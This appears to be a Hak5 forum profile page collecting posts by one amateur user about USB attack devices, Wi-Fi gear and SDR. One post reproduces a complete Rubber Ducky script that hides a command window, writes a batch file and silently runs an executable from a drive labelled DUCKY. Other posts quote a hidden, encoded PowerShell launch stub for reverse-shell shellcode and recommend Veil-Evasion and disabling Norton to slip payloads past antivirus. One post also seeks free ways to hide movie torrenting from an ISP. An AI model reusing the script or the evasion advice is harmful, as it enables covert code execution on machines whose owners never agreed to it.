Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


1 Follower

About datajumper

  • Rank
    Hak5 Zombie

Recent Profile Visitors

1,151 profile views
  1. i am an amature at this but ....ill try to help lol if it dont help im sorry do you have these packages installed ? .......... python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev dpkg -s python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev If not, to install: apt-get install python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev its easier just to send u the link i found lol its got something to do with the cdra package is what everyone is saying i hope this helps if not just ignore me lol
  2. can this be done also with the arduino atmegau34 leonardo pro micro ? i tried to run the ducky code thru duckuino converter and therese too many errors for me to figure out lol i would like to execute a .exe ( " payload.exe" ) for example by pluging in a plash drive along with the 32u4 leonardo and have it execute my .exe file off the flash drive what i had in mind if this would work is they make a single male to double usb female adapter i would like to see if this can be done im sure it can but my programming skills are limited lol in other words im a dummy .. but if any of you all has example code that i can have that would be great ... i have already asked this question on here but no replies yet here is the link the code i tried is there too thanks in advance
  3. ok guys i have a question ...i recently came across this ducky script but i dont actually have a rubber ducky i have been using my arduino leonardo pro micro 32u4 chip i have been using duckuino to convert ducky payloads over to arduino ide on this particular script the duckuino compiler wiggs out on line # 6 ... the DEFAULT_DELAY 25 see the script is set to when it see's a drive called " DUCKY " mounted it runs a batch file i was going to attempt this by puting my arduino pro micro 32u4 into a usb hub along with a flash drive named " DUCKY " ..can i do this ??? or am i being stupid ?? lol if anyone knows a way i can run a .exe with arduino leonardo atmega32u4 pro micro or i also have a digispark atiny85 as well but i kinda like the pro micro of course i will use whatever works the best if you all could help me with this that would be great if i have been unclear please tell me so and i will do my best to clean up my question a bit as always thanks in advance guys here is the code that::::: REM Author: overwraith published ..................................................................................................................................................... REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 25 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER ..................................................................................................................................................... and here is where i tried to convert his code to arduino using Error: Unknown command or key 'DEFAULT_DELAY' at line: 6. (" in picture " )
  4. oh i get it man lol yeah im not too fond of the colors myself haha and idk why but i actually like the stock firmware on the asus ..the one i had ..i cant remember the model off the top of my head but i done every kind of test i could think of at that think then i even tried to brick it on purpose just for shits ang giggles and the asus was unbrickable i know thats irrealavent i just thought id throw that out there lol good luck brother
  5. yeah lol i made the mistake of painting a yagi 2.4ghz antenna camouflage because i didnt want it to be seen ..but the paint had lead or something in it i guess and needless to say it never worked right after that done great b4 i painted it lol so yeah i agree with barry be careful about the paint
  6. right right lol
  7. ive never used one of these but someone told me about them a year ago TP-Link N300 Wireless Wi-Fi Nano lol ...or TP-Link N150 Wireless Wi-Fi Portable Router with Range Extender/Access Point/Client/Bridge Modes (TL-WR700N) you did say mini i guess it depends on your project
  8. i will definatley let her know thanx man !
  9. guys im asking this for my sister she called me the other day ...she has comcast cable and internet and they aparently flagged her before for downloading torrents and she got out of it by saying her wifi was open that it must have been a neighbor lol but she downloads movie torrents and they are telling her all the usual copyright infringement bullshit she said she installed tor then downloaded the new chips movie then comcast called her again and told her if it happens again no matter who does it neighbor / friend / cousin it dont matter they are going to turn her service off and investigate i told her that tor will keep her browsing somewhat safe " depends" but once she loads a torrent into transmistion bit torrent client they can see all the peers and traffic i told her to get a vpn but she doesnt want to pay for anything so then i said well let me ask the guys on hak5 forums so now im asking you guys either free vpn or another no cost solution so she can download her torrents again ? thanks in advance guys personally if i have software or a movie and you all wanted it i should be free to share it with whoever i wanted but they dont see it that way ... thanx again guys
  10. after STRING powershell -nop -win hidden -noni -enc then add shellcode .........can that be converted to digispark using duckuino converter?? im having problems adding my shellcode due to lack of space on the digispark is there any examples you can give me i just need a small reverse_tcp script to run on the digispark would you care to help me ? some guys on here gave me a few examples but when i use msfvenom to generate the shellcode its way to big i need help either to make it smaller or another method all together and plz keep in mind even tho ive been using metasploit 4 a while im still a noob with all of this rubberducky and digispark programming stuff ...a copy and paste example would be nice lol the saying goes bigger is always better lol not in this case i need smaller
  11. if you use metasploit to gain a reverse_tcp connection once you gain a meterpreter session you can run the killav command but if the problem is that you cant get past the antivirus to drop your shell code or payload you can try Veil-Evasion create a payload with veil it has an option to encode ruby into your payload and several other methods or if you have physical accsess to the keyboard of the target machine and if you have enough time norton should be running in the bottom right hand corner just right click on the norton icon it should have a disable sheilds button .....disable it temporarely until you get whatever it is that you was trying to do but veil-evasion works 4 me gain a reverse tcp session then you are back doored in .... my recent exploit ...what i did was i had my metasploit listener setup at home then i put my veil-evasion payload on to a regular usb thumb drive and went to a friends house "i had permision lol" and i put it in the machine right clicked on the veil evasion payload and chose run as administrator and it walked past the antivirus no problem and i had my phone ssh 'd into my listening machine at home so i had full control on the go .......i know this isnt probably what you were looking for i hope it helped ...if not theres some really smart really experienced pentesters on this forum just hang around be patient one of these guys should be able to help
  12. oh man ive been thinking of doing this for a while ...if i can do it cheap enough im going 4 it lol you guys are awsome ! .... can this be done with a rtl sdr like the one darren kitchen had ? i think its like 20 bucks i only ask because i seen the link that dave ee jones posted about the evil socket but this is a great project if we can accomplish it i mean because everyone is going to cell phone my girlfriend doesnt even get on her laptop anymore at all good luck getting me to give up my laptop / desktop's lol ill be running linux til the world ends thanks 4 the idea thumbs up !!!
  13. im sorry just one more question and i will leave u alone can i intercept phone calls and sms with the sdr ? or is that a stupid question ?'
  14. oh ok so just an sdr ... ok cool u said i cant actually attack the network like aircrack mdk3 ect ? thanks barry this gives me a better idea so basically if im getting this right i can look but not touch or listen i should say lol ive googled this and ive found some info uhmm but the guys are using these really expensive multi freq adapter like a huge box with all kinds of antennas lol but i have yet to find any attacks like aircrack like i mentioned but thank u so much again